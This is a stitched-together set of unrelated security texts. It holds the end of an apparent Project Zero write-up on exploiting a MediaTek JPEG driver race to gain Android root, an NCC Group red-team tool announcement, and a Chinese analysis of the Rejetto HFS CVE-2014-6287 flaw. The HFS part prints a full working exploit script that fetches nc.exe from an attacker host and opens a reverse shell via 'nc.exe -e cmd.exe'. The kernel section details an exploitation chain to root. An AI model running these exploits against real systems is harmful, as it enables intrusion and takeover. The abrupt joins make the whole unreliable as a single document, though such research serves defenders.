                                        _jpeg_hybrid_dec_int_status[hwid],

                                        timeout_jiff);

                                ...

                                if (ret < 0) {

                                        waitfailcnt++;

                                        usleep_range(10000, 20000);

                                }

                        } while (ret < 0 && waitfailcnt < 500);

                }

                ...

                if (copy_to_user(pnsParmas.progress_n_status, &progress_n_status,                                sizeof(int))) {

                        return -EFAULT;

                }

                ...

                jpeg_drv_hybrid_dec_unlock(hwid);

                break;

                ...

}

...

static void jpeg_drv_hybrid_dec_unlock(unsigned int hwid)

{

        mutex_lock(&jpeg_hybrid_dec_lock);

        if (!dec_hwlocked[hwid]) {

                JPEG_LOG(0, "try to unlock a free core %d", hwid);

        } else {

                dec_hwlocked[hwid] = false;

                JPEG_LOG(1, "jpeg dec HW core %d is unlocked", hwid);

                jpeg_drv_hybrid_dec_power_off(hwid);

                disable_irq(gJpegqDev.hybriddecIrqId[hwid]);

                jpg_dmabuf_free_iova(bufInfo[hwid].i_dbuf,

                        bufInfo[hwid].i_attach,

                        bufInfo[hwid].i_sgt);

                jpg_dmabuf_free_iova(bufInfo[hwid].o_dbuf,

                        bufInfo[hwid].o_attach,

                        bufInfo[hwid].o_sgt);

                jpg_dmabuf_put(bufInfo[hwid].i_dbuf);

                jpg_dmabuf_put(bufInfo[hwid].o_dbuf);

                // we manually add 1 ref count, need to put it.

        }

        mutex_unlock(&jpeg_hybrid_dec_lock);

}

jpeg_drv_hybrid_dec_unlock is also called in the event that jpeg_drv_hybrid_dec_start fails.

While the jpeg_hybrid_dec_lock mutex protects the direct core locking and unlocking, it does not protect the body of the jpeg_drv_hybrid_dec_start function. This means that while there cannot be concurrent calls to both jpeg_drv_hybrid_dec_lock and jpeg_drv_hybrid_dec_unlock, there can be concurrent calls to jpeg_drv_hybrid_dec_start and jpeg_drv_hybrid_dec_unlock which in practice is just as bad, as these two functions racily access the same global data structure bufInfo.

One small added complication for this bug is that in order to reach the jpeg_drv_hybrid_dec_unlock in the JPEG_DEC_IOCTL_HYBRID_WAIT call, the core must be locked before the timeout due to a check to ensure that the core is locked before attempting to wait on the core.

An example of this race in practice with two processes A and B would be (colorized respective to the above code):

Process A:

Calls ioctl JPEG_DEC_IOCTL_HYBRID_START, which locks core 0 with jpeg_drv_hybrid_dec_lock and enters jpeg_drv_hybrid_dec_start

Process B:

Calls ioctl JPEG_DEC_IOCTL_HYBRID_WAIT, which confirms that core 0 is locked then begins a 3 second wait for the core to send an interrupt denoting completion of the decoding request.

Process A:

Fails jpeg_drv_hybrid_dec_start, (after initializing some of the data structures), calls jpeg_drv_hybrid_dec_unlock on core 0 freeing any allocated resources, and returns to userland.

[wait ~3 seconds]

Process A:

Calls ioctl JPEG_DEC_IOCTL_HYBRID_START, which locks core 0 with jpeg_drv_hybrid_dec_lock and enters jpeg_drv_hybrid_dec_start

Process B:
3 second wait times out, and the JPEG_DEC_IOCTL_HYBRID_WAIT ioctl call unlocks core 0 with jpeg_drv_hybrid_dec_unlock.

[Process A and B are now concurrently initializing and freeing the same data-structures]

This can lead to a variety of use-after-free or double free conditions, depending on how process A and B race.

The Journey to root

The next step was to try to exploit these issues. My first attempt targeted the OOB write issue, CVE-2023-32837. I was able to develop the primitive from an uncontrolled OOB read/write in the kernel .data region into a racy write of null bytes at a predetermined offset in a kernel task stack used by an attacker-controlled process. At this point it was possible to overwrite a kernel stack entry with nulls during any syscall which felt to me like enough flexibility to create a full exploit. However, despite my best efforts (including the creation of a tool to find where in an arbitrary backtrace the write would occur), I was unable to discover a technique to create a better primitive from this write.

Failing that effort, I decided to take a look at the other issue in the same driver CVE-2023-32832. During the freeing step that races with jpeg_drv_hybrid_dec_start, jpeg_drv_hybrid_dec_unlock drops access to four separate resources:

jpg_dmabuf_free_iova(bufInfo[hwid].i_dbuf, bufInfo[hwid].i_attach, bufInfo[hwid].i_sgt); //The input buffer virtual address mapping in the core

jpg_dmabuf_free_iova(bufInfo[hwid].o_dbuf, bufInfo[hwid].o_attach, bufInfo[hwid].o_sgt); //The output buffer virtual address mapping in the core

jpg_dmabuf_put(bufInfo[hwid].i_dbuf); //The input buffer file's refcount is decremented. This buffer was previously allocated by the attacker and is associated with a file descriptor.

jpg_dmabuf_put(bufInfo[hwid].o_dbuf); //The output buffer file's refcount is decremented. This buffer was previously allocated during jpeg_drv_hybrid_dec_start.

One critical behavior of the driver that enhanced exploitability was that although jpeg_drv_hybrid_dec_unlock properly drops the refcounts of i_dbuf and o_dbuf, it does not reinitialize those entries in the bufInfo global array to NULL. As it relates to the race, this means that if Process B’s racy jpeg_drv_hybrid_dec_unlock occurs before Process A’s second jpeg_drv_hybrid_dec_start reinitializes i_dbuf and o_dbuf, an extra refcount of i_dbuf and o_dbuf will be released. Since i_dbuf and o_dbuf are struct file*’s, this can lead directly to a struct file UAF. As the i_dbuf struct file comes directly from a dmabuf file descriptor passed into jpeg_drv_hybrid_dec_start, this leads to a dangling file descriptor with the struct file freed from underneath it. This is undoubtedly an exploitable bug.

There are several different techniques for exploiting a dangling file descriptor. One widely used strategy is causing the backing slab page of the struct file to be freed and returned back to the page allocator, then reallocating that page with pipe buffer data pages in order to gain attacker control over the memory used for the struct file. Another well-known strategy would be to utilize the cross-cache technique to reallocate the memory as a different kind of kmalloc slab/object. However, in the future both of these techniques may be remediated if the SLAB_VIRTUAL mitigation comes into effect in the mainline Linux kernel. In the interest of exploring the future of Android kernel hacking, I sought a novel exploitation technique which did not involve cross-cache or slab-cache->page allocator heap shaping techniques.

Some Other Novel Exploitation Technique

One of the most common UAF exploit techniques involves reallocating the first-order freed object with a new object of a different type, creating a type-confusion condition which leads to an improved memory corruption primitive. However the only type of object that can be allocated in a page designated for the struct file cache is the struct file type, so the options for creating a type confusion memory corruption condition using first-order object reclamation are limited. However, just because an object is freed does not preclude it from being usable under limited circumstances. When the kernel inserts an object onto a freelist, this clobbers the middle of the object. The rest of the object however, remains in whatever state it was in at the moment it was freed, including pointers and any other member variables. Those stale pointers can (and in practice often do) point to other freed objects which may be allocated from a different slab cache entirely, potentially including the generic kmalloc slab-caches. Note that under the C-ism where pointers are set to NULL after freeing, these stale pointers wouldn’t exist. However as the memory containing the pointer is getting freed anyway, setting these pointers to NULL is often seen as unnecessarily conservative (and in fact, C compilers often throw away writes to objects that are about to be freed).

By continuing to use this freed first-order object, we can implicitly access freed second-order child objects. By reclaiming those objects, we can recreate a type-confusion memory corruption primitive, taking advantage of how the methods called on the first-order freed object implicitly access the second-order child object. Let’s see how we can apply this to our specific scenario.

Linux kernel struct files may represent many different types of files depending on the kind of opened file such as ext4 files, procfs files, or even MediaTek JPEG decoding driver files. In order to represent all of these different types while also maintaining some commonality of structure for the universally needed members of an opened file, struct file contains a private_data member which references any type-specific data needed.

As mentioned previously, the UAF’d struct file in this case is a dmabuf file. This means the private_data pointer points to a struct dma_buf object. The dma_buf object lifetime is implicitly tied to the lifetime of the associated dmabuf file struct. When the dmabuf struct file is freed, the dma_buf object is freed too. However unlike the struct file, dma_buf objects are allocated from the generic kmalloc slab caches. This means that the dma_buf can be reclaimed with a different type object that comes from the same generic kmalloc slab cache.

After a hypothetical reclamation by a new object, this new object can still be UAF referenced as a dma_buf through the freed but still very usable dmabuf struct file that itself is referenced via the dangling file descriptor! Thus we arrive at the following strategy:

  1. Free the file by using our race condition bug to drop an extra reference on i_dbuf (which also frees the dma_buf), leaving a dangling fd pointing to a freed struct file which still has a stale pointer to a freed dma_buf
  2. Reclaim the dma_buf WITHOUT reclaiming the struct file
  3. Call dma_buf operations on the dangling fd

You may have astutely noted by this point that this strategy relies on a freed object (that is, the struct file) not being reclaimed as another object by the heap allocator. This is absolutely correct, and one would expect that in an exploit where exceptional reliability is a priority, it may be necessary to perform some heap shaping in order to bury this freed struct file deeply in the allocator freelists. In practice (and in my exploit), the freed struct file will rarely be on the percpu active slab so it’s unlikely to get reclaimed immediately, and my exploit generally runs fast enough that it doesn’t matter.

At this point we now need to determine what object to use in order to reclaim the freed dma_buf, as well as what operation to call on the freed dma_buf file/object to develop a stronger primitive. I ended up finding the solutions to both of these problems in the GED driver.

The GED driver

The GED (GPU Extension Device) driver is a MediaTek-specific interface that provides userland with several supplementary GPU features, primarily for tuning purposes. Two of its “features” appeared particularly valuable. Feature number one, GED GE Buffers, presented a truly remarkable heap spray and reclamation primitive. This feature provides several requisite characteristics of a suitable heap spray primitive:

  • Allocates buffers of a controlled size without causing undue noise for the rest of the heap.
  • Buffer data is fully attacker controlled, with no uncontrolled header at the beginning
  • Buffers can be freed at any time.

One standout characteristic that elevates this heap spray primitive above many of its peers however, is that even once allocated, the attacker can read and write to these buffers at will while keeping the buffer allocated. This is about as powerful a heap spray primitive as one could imagine. By reclaiming the UAF’d dma_buf struct with a GED GE buffer, we gain fully deterministic read/write over the dma_buf struct, including any pointers contained therein.

Graph showing the overlapping object hierarchy of a UAF'd dma buffer struct file and a GE file

Feature number two is an alternate codepath to the same functionality as the DMA_BUF_SET_NAME ioctl, which is (very sensibly) used to set the name of a dma_buf. The biggest difference between these paths is the GED codepath’s lack of SELinux inode checks on the underlying dma_buf fd. These inode checks would normally crash the kernel when they run on a freed struct file - however because of the GED codepath, we can skip this inode check, and change the dma_buf’s name despite running on a freed dma_buf file! Normally, this code would free the pointer to the previous name within the dma_buf struct and allocate a new buffer for the name string. However, because of GED GE buffers we are able to control the entirety of the dma_buf struct. By combining these primitives, we can kfree an arbitrary pointer before setting a new name string.

long mtk_dma_buf_set_name(struct dma_buf *dmabuf, const char *buf)

{

        char *name = kstrndup(buf, DMA_BUF_NAME_LEN, GFP_KERNEL);

        ...

        kfree(dmabuf->name); //dmabuf is attacker controlled

        dmabuf->name = name; //the name pointer is written to attacker controlled memory

        ...

}

Achieving arbitrary read

Innocuous dmabuf file operations become potent primitives now that we have precise control of the dma_buf struct. For example, this is the code backing /proc/pid/fdinfo/n for dmabuf files:

static void dma_buf_show_fdinfo(struct seq_file *m, struct file *file)

{

        struct dma_buf *dmabuf = file->private_data;

        seq_printf(m, "size:\t%zu\n", dmabuf->size);

        /* Don't count the temporary reference taken inside procfs seq_show */

        seq_printf(m, "count:\t%ld\n", file_count(dmabuf->file) - 1);

        seq_printf(m, "exp_name:\t%s\n", dmabuf->exp_name);

        spin_lock(&dmabuf->name_lock);

        if (dmabuf->name)

                seq_printf(m, "name:\t%s\n", dmabuf->name);

        spin_unlock(&dmabuf->name_lock);

}

There are several opportunities in this function for achieving arbitrary read, but the cleanest one is the file_count() call, which will dereference the passed pointer + a hardcoded offset, and print the read 8 byte value as a signed long. Normally in the context of this C function, file == ((struct dma_buf*) file->private_data)->file , but since we control the dma_buf struct that isn’t necessarily the case.

Achieving arbitrary write

At this point we have three powerful primitives:

  • Read/write UAF’d dma_buf struct memory (via GED GE buffers)
  • Arbitrary read (via dma_buf_show_fdinfo)
  • Arbitrary free (via ged_dmabuf_set_name)

Graph showing our arbitrary read and arbitrary free primitives via the UAF'd dma buffer

There are many potential strategies that use these primitives to achieve an arbitrary write primitive. The technique I chose was to type-confuse a GE buffer with a GE buffer array. GED GE Buffers are tracked through a hierarchy of structs and arrays. A GE file’s private_data member points to an array of GE buffer pointers like so:

Graph showing the object hierarchy of GE files within an fdtable down to GE buffers

I achieve this type-confusion by using the arbitrary-free primitive developed previously to free a GE buffer array, then reclaiming that array with a GE buffer from a second GE file. Since the GE buffer array (and GE buffers as well) come from generic kmalloc caches, the only requirement for this reclamation is allocating GE buffers that are the same size as a GE buffer array. If two GE files are referencing the same memory, one (GE file A) as a GE buffer, and one (GE file B) as a GE buffer array, I can modify the contents of a GE buffer array at will.

Graph showing the overlapping object hierarchy of two GE files where one file's GE buffer is another file's GE buffer array

Then performing an arbitrary write to a virtual address X will be as simple as using GE file A’s GE buffer to change the contents of the array to point to the virtual address X, then writing to that address using GE file B which now thinks virtual address X is a GE buffer!

This technique hinges on being able to use the arbitrary free primitive to free a GE buffer array. To do that, it’s necessary to find the virtual address of a GE buffer array first. Since we have an arbitrary read primitive already, any parent struct/object/array of a GE buffer array will be enough to find the virtual address of a GE buffer array itself. The hierarchy is as follows:

  1. GE arrays are referenced by a GE file
  2. GE files are referenced by an fdtable as a file descriptor
  3. An fdtable is referenced by a task struct
  4. Task structs are referenced as part of the task list with the root node being the init task in the kernel image

The fdtable represents an attractive object to find, as it comes out of the same generic kmalloc cache as dma_buf name strings. We can find a dma_buf name string’s virtual address by using dma_buf_set_name (which we also use as our arbitrary free primitive) to insert a pointer to a dma_buf name string into the reclaimed UAF’d dma_buf object that is now a GE buffer. We then simply read it out of our GE buffer, free that dma_buf name string (again using dma_buf_set_name), and reclaim it with an fdtable. Creating fdtables is fairly easy - we simply fork many processes ahead of time that share an fdtable, then unshare(2) the fdtable at the appropriate time to allocate new fdtables. The full exploit strategy is as follows:

  1. Trigger a dangling fd of a dmabuf file using our mtk-jpeg race condition bug
  2. Reclaim the underlying dma_buf leaving the parent dmabuf file free (but still referenced by a dangling file descriptor)
  3. Use ged_dmabuf_set_name on our dangling file to place a new name pointer in the fake dma_buf struct
  4. Read the fake dma_buf struct (which is really a GE buffer) to get the name pointer
  5. Free the name pointer by calling ged_dmabuf_set_name again
  6. Reclaim the name pointer as an fdtable with references to a GE fd with an array of GE buffers
  7. Use the arbitrary read to find the GE buffer array
  8. Use the arbitrary free to free the GE buffer array
  9. Reclaim the GE buffer array with another GE buffer

At the end of this process we’ll have a reliable arbitrary read/write!

Getting a root shell

As a fun exercise, I decided to see how easy it was to disable SELinux and get root after achieving arbitrary read/write. Various manufacturers may implement certain tripping hazards to slow down exploit development efforts, but in my case (Asus ROG 6D), there were no hoops I needed to jump through at all. It was enough to simply write 0 to the uid/gid of my process’s cred struct to achieve root, and write 0 to the selinux_enforcing bit to turn off SELinux. After this I just execlp(“/system/bin/sh”,...) and out pops a root shell!

Getting root on an Android device with the exploit

Conclusion

I discovered significant security vulnerabilities across all 3 of the evaluated devices. It is highly likely that reviewing more devices comprising a greater spread of chipset manufacturers would lead to the discovery of additional vulnerabilities. Android regularly uses higher-privileged processes to liaise between applications and kernel drivers, meaning that most kernel drivers cannot be seen from an unprivileged app context (the GPU being the most obvious exception to this rule). Nevertheless, a determined attacker could use vulnerabilities in other more privileged processes to pivot into contexts from which the attack surface of these kernel drivers become reachable. This pivot strategy could widen the attack surface beyond the scope of this research.

As it becomes more difficult to find 0-days in core Android, third-party Linux kernel drivers continue to become a more and more attractive target for attackers. While the bulk of present-day detected ITW Android exploitation targets GPU drivers, it’s equally important that other third-party drivers are encouraged towards the same security standards.

There is room for improvement in the patching process across all 3 of the bugs discovered. None of the patches for these bugs met Project Zero's 90-day deadline for patches reaching end-users. This appears to largely be a result of the propagation delay from when third-party driver developers issue patches to when downstream manufacturers can incorporate those patches into Android security updates. Shortening this propagation delay (e.g. using Android APEX to ship updated kernel drivers) would go a long way to minimizing the Android driver patch gap. In addition, one of these bugs was only partially patched and remained exploitable on some devices for an additional 2 years before the security impact of the bug was assessed and publicly reported. Developers should regularly consider the security impacts of bugs, especially those reported by static analysis tools designed to detect security-relevant issues.

Finally, while cross-cache heap shaping mitigations significantly impede exploit development strategies, they don’t entirely prevent a determined attacker from exploiting kernel UAF vulnerabilities, even if the UAF’d object comes out of a dedicated slab cache. In this particular case, second-order allocations in a UAF’d object lead to powerful and exploitable primitives. Developers may be able to mitigate this technique by setting pointers to NULL, even if the parent object is about to get freed anyway. However, this exploit technique demonstrates that even well-designed mitigations (such as SLAB_VIRTUAL) come with limitations in an era where an attacker can achieve undetected memory corruption. It will take more fundamental mitigations that address the root issue of memory corruption, like MTE, in order to dramatically raise the bar for attackers.

Resources

This research was presented at ShmooCon, a video is available here https://archive.org/details/shmoocon2024/Shmoocon2024-SethJenkins-Driving_Forward_in_Android_Drivers.mp4

The proof of concept exploit code developed and presented in this research is available at:

https://bugs.chromium.org/p/project-zero/issues/detail?id=2470#c4

Stepping Stones – A Red Team Activity Hub

Executive Summary

NCC Group is pleased to open source a new tool built to help Red Teams log their activity for later correlation with the Blue Team’s own logging. What started as a simple internal web based data-collection tool has grown to integrate with Cobalt Strike and BloodHound to improve the accuracy and ease of activity recording. As the tool became integral to how NCC Group’s Full Spectrum Attack Simulation (FSAS) team delivered Red and Purple Team assessments additional functionality such as reporting plugins and credential analysis have grown the tool into something we believe could benefit the wider Red Teaming community.

Access the code at: https://github.com/nccgroup/SteppingStones

Features

Activity Recording

At the heart of Stepping Stones are “Events” which describe a specific Red Team action between a source and a target. They can be annotated with MITRE ATT CK IDs, tags or the raw command line evidence, but the original design philosophy was to make data capture as effortless as possible so none of these are mandatory in order to allow data to be entered “in the heat of battle” rather than retrospectively.

Additionally, files can be dropped onto an Event to record where artifacts have been placed (allowing more effective post-job clean-up) and to generate file hashes for Blue Team reporting.

Cobalt Strike Integration

Stepping Stones includes a bot which can connect to your Cobalt Strike team server and stream activity into Stepping Stones. This is held in a separate area of the application so that the only relevant activity can be “cherry picked” and escalated into a reportable Event. This “cherry-picking” workflow also applies to other types of ingested activity like PowerShell transcripts imported via the bespoke EventStream format.

Alternatively, as beacons are spawned the source/target dropdowns for Events are updated with any new hosts, users and processes so that Events can also be manually recorded against the compromised systems.

Having access to real-time Cobalt Strike activity facilitates other functionality such as being able to notify (via webhooks) when a beacon first connects, or mark one as “watched” so that a Red Team operator can be re-notified should a dormant beacon reconnect, e.g. when a victim powers on their laptop the next day. Beacons and their associated activity can alternatively be excluded from the UI, reports and notifications if they match configurable patterns that identify them as the result of internal testing rather than genuine victim activity.

BloodHound Integration

To further improve the accuracy of sources and targets Stepping Stones can connect to BloodHound’s Neo4j database and use the data within to suggest users and hosts.

Again, with this integration in place a number of other features were subsequently added to make the life of the Red Team operator easier: there is a tree view of the domain(s) OU structure in Stepping Stones based on the BloodHound data – allowing a more familiar hierarchical target selection view of the graph data. Similarly, Stepping Stones facilitates building wordlists from text in BloodHound to help crack those accounts whose password is derived from the account name or a comment on the user in AD.

Credentials

A successful Red Team operation will come across a number of passwords, secrets and hashes on their way to meeting their objectives. Managing these can be cumbersome and the Credentials area of Stepping Stones aims to alleviate that. Hashes and passwords can be extracted from raw tool output or the streamed Cobalt Strike activity, and any associated compromised accounts marked as “owned” within BloodHound automatically.

Features from https://github.com/crypt0rr/pack/ have been re-implemented to generate likely wordlists and hashcat masks from previously cracked data.

A graphical dashboard provides further insight into the patterns used for passwords, generating graphs for statistics like those produced by https://github.com/digininja/pipal and comparisons against the https://haveibeenpwned.com/ breached passwords.

Architecture

Stepping Stones has been “dog fooded” by the FSAS team throughout its multi-year development and has been able to happily scale up to multi-month jobs. However, the system aims to still be useful even if not integrated with Cobalt Strike/BloodHound.

It is a Python Django web application which can run on either Windows or Linux. The philosophy is to deploy a fresh instance for each engagement, as it supports multiple users, but not multiple engagements. The database is currently SQLite, allowing all data for that engagement to be archived without cross contamination between jobs or a build up of multiple jobs worth of sensitive data.

Full installation and upgrade steps can be found in the read me file.

[CVE-2014-6287]Rejetto HTTP File Server远程命令执行漏洞分析

作者:k0shl 转载请注明出处:https://whereisk0shl.top


漏洞说明


软件下载:
https://sourceforge.net/projects/hfs/files/HFS/2.3b/ (感谢@1195011908更正目标软件下载地址)

PoC:

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#          It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#          It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 
  
#Usage : python Exploit.py <Target IP address> <Target Port Number>
 
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!
 
 
import urllib2
import sys
 
try:
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
 
    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
 
    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
 
    ip_addr = "192.168.44.128" #local IP address
    local_port = "443" # Local Port number
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save= "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe= "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1= "exec|"+vbs3
    script_create()
    execute_script()
    nc_run()
except:
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""

直接运行,输入想执行的命令即可


此漏洞是一个命令注入漏洞,原因是hfs.exe中,对于检测规则控制不严格,导致可以利用%00截断符绕过检测机制,从而执行后面的命令,达到任意命令执行的目的,下面对此漏洞进行详细分析。


漏洞分析


这里使用?search = %00{.exec|calc.}作为测试代码,首先hfs.exe会在00403282地址处,接收到search请求的字符串。

0:000> g
Breakpoint 3 hit
eax=0012e5b0 ebx=0012f620 ecx=0000000d edx=010c78e8 esi=0012e5b0 edi=010c78e8
eip=00403282 esp=0012e598 ebp=00000016 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
hfs_exe_unpacked_+0x3282:
00403282 df3c11          fistp   qword ptr [ecx+edx] ds:0023:010c78f5=0000000000637c63
0:000> dc 010c78ef
010c78ef  652e7b00 7c636578 00000063 00000000  .{.exec|c.......
010c78ff  00000000 0c7ef900 431e6401 00000000  ......~..d.C....
010c790f  4355fc00 cebf0000 d066d800 cebf3800  ..UC......f..8..
010c791f  00000800 000060ff 00000000 0c7f4900  .....`.......I..
010c792f  00000001 00000000 53464800 4449535f  .........HFS_SID
010c793f  332e303d 37323730 31303031 30323631  =0.3072710011620
010c794f  00003730 0c815100 00000001 00001a00  07...Q..........
010c795f  72623c00 d6bbb23e bbd6b3a7 d3acbaf2  .<br>...........
0:000> dc edx
010c78e8  72616573 003d6863 78652e7b 637c6365  search=.{.exec|c

在010c78e8位置是在接收字符串,实际上,这个地址外层函数实现的功能是对接收到的GET参数进行判断,从而执行不同的代码逻辑,这里胡接收到?search的内容。

接下来,程序会进入一处正则表达式匹配,在这里,会对接收到的参数内容进行过滤。

.text:00509828                 push    ebx
.text:00509829                 push    0
.text:0050982B                 mov     ecx, offset dword_50986C
.text:00509830                 mov     edx, offset a__ ; "\\{[.:]|[.:]\\}|\\|"
.text:00509835                 mov     eax, [ebp+var_4]
.text:00509838                 call    sub_50A848

在这个过程中,会逐一遍历search后面的参数,也是漏洞触发的关键原因。地址00509830位置会将正则字符串推入栈中进行匹配。匹配后会进行转码,从而避免执行命令。

比如,当我们输入一个正常search参数的时候。

0:000> g
Breakpoint 1 hit
eax=00d135c8 ebx=00579ecc ecx=0000002f edx=00000003 esi=00000003 edi=00000030
eip=00509147 esp=0012f04c ebp=0012f088 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
hfs_exe_unpacked_+0x109147:
00509147 e84c7d0000      call    hfs_exe_unpacked_+0x110e98 (00510e98)
0:000> dc eax
00d135c8  65722e7b 63616c70 7c227c65 6f757126  {.replace|"|&quo
00d135d8  207c3b74 32312326 652e3b33 26636578  t;| {.exec&
00d135e8  34323123 6c61633b 34232663 2e7d3b36  #124;calc.}.

可以看到对应部分已经被转码,但是这里却没有对%00作为判断,默认遇到%00就截断了,因此可以利用这个方法绕过检测。

0:000> bp 00509147 ".if(@eax == 0x00d22728){;}.else{g;}"

0:000> g
(344.348): Unknown exception - code 0eedfade (first chance)
(344.348): Unknown exception - code 0eedfade (first chance)
eax=00d22728 ebx=00579ecc ecx=0000000c edx=00000004 esi=00000003 edi=0000000d
eip=00509147 esp=0012f04c ebp=0012f088 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
hfs_exe_unpacked_+0x109147:
00509147 e84c7d0000      call    hfs_exe_unpacked_+0x110e98 (00510e98)
0:000> dc eax
00d22728  652e7b00 7c636578 636c6163 00007d2e  .{.exec|calc.}..

这里可以看到处理后的字符串没有转码,直接输出了,这就造成了漏洞的发生,接下来。

int __stdcall sub_5096E0(signed int a1, int a2)
{
  int result; // eax@2
  int savedregs; // [sp+Ch] [bp+0h]@2

  if ( a1 <= 50 )
  {
    sub_508ECC(&savedregs);
    result = sub_509418((int)&savedregs);
  }
  return result;
}

程序胡自进入sub_5096E0中对字符串进行处理,这里所谓的处理过程,就是对于exec和calc的分开,主要就是为了后续匹配exec,然后执行calc。首先

0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00000003 esi=0000000c edi=0000000d
eip=00405987 esp=0012f020 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x5987:
00405987 7f11            jg      hfs_exe_unpacked_+0x599a (0040599a)     [br=0]
0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00000003 esi=0000000c edi=0000000d
eip=00405989 esp=0012f020 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x5989:
00405989 01c2            add     edx,eax
0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00d2272b esi=0000000c edi=0000000d
eip=0040598b esp=0012f020 ebp=0012f044 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
hfs_exe_unpacked_+0x598b:
0040598b 8b442408        mov     eax,dword ptr [esp+8] ss:0023:0012f028=0012f080
0:000> dc edx
00d2272b  63657865 6c61637c 007d2e63 007c5c00  exec|calc.}..\|.
00d2273b  d2310100 00000000 00000c00 53464800  ..1..........HFS
00d2274b  cfc5d03d d0d0d6a2 d00000c4 0000edb1  =...............
00d2275b  d1c00000 00000100 00001000 74706f00  .............opt
00d2276b  2e6e6f69 6d6d6f63 3d746e65 31000031  ion.comment=1..1
00d2277b  d1c00000 00000100 00000e00 4c505500  .............UPL
00d2278b  2044414f 55534552 0053544c 00000000  OAD RESULTS.....
00d2279b  d1c00000 00000100 00000e00 524c4100  .............ALR

这里会处理字符串{.部分,获得一个新的字符串,然后继续跟踪。

0:000> g
Breakpoint 8 hit
eax=010c3150 ebx=0012ed54 ecx=636c6163 edx=010c2af0 esi=010c3150 edi=010c2af0
eip=00403324 esp=0012ed00 ebp=0012ed34 iopl=0         nv up ei ng nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000297
hfs_exe_unpacked_+0x3324:
00403324 c3              ret
0:000> dc eax
010c3150  636c6163 6c610000 00650063 010c2960  calc..alc.e.`)..
010c3160  00000001 0000000b 72616553 cb3d6863  ........Search=.
010c3170  00f7cbd1 010c2960 00000001 0000000b  ....`)..........
010c3180  646c6f46 c43d7265 00bcc2bf 010c2960  Folder=.....`)..
010c3190  00000001 00000009 6b636142 bbb5b73d  ........Back=...
010c31a0  312d00d8 010c2960 00000001 0000000b  ..-1`)..........
010c31b0  b73d7055 c9d8bbb5 00e3b2cf 010c2960  Up=.........`)..
010c31c0  00000001 00000009 656d6f48 d2d7ca3d  ........Home=...
0:000> dc 010c2b68
010c2b68  63657865 78650000 00006365 010c2960  exec..exec..`)..
010c2b78  00cc49a0 00000007 70747468 002f2f3a  .I......http://.
010c2b88  00650031 010c2960 00000001 00000009  1.e.`)..........
010c2b98  454d4954 46454c20 00000054 010c2a71  TIME LEFT...q*..
010c2ba8  00000000 00000007 45464552 00524552  ........REFERER.
010c2bb8  00454d49 010c2960 00000001 00000008  IME.`)..........

通过下内存写入断点,可以看到处理后会将exec和calc分开。接下来程序会进入一处sub_52CE88函数,这个函数会对calc字符串进行拷贝。

int __usercall sub_52CE88@<eax>(int a1@<eax>, int a2@<edx>, int a3@<ebx>)
{
  int v3; // esi@1
  int v4; // ecx@1
  int v5; // ecx@1
  int v6; // ecx@1
  int v7; // ebx@3
  int *v8; // ecx@5
  unsigned int v10; // [sp-Ch] [bp-1Ch]@1
  void *v11; // [sp-8h] [bp-18h]@1
  int *v12; // [sp-4h] [bp-14h]@1
  int v13; // [sp+8h] [bp-8h]@1
  int v14; // [sp+Ch] [bp-4h]@1
  int savedregs; // [sp+10h] [bp+0h]@1

  v13 = 0;
  v3 = a2;
  v14 = a1;
  __linkproc__ LStrAddRef();
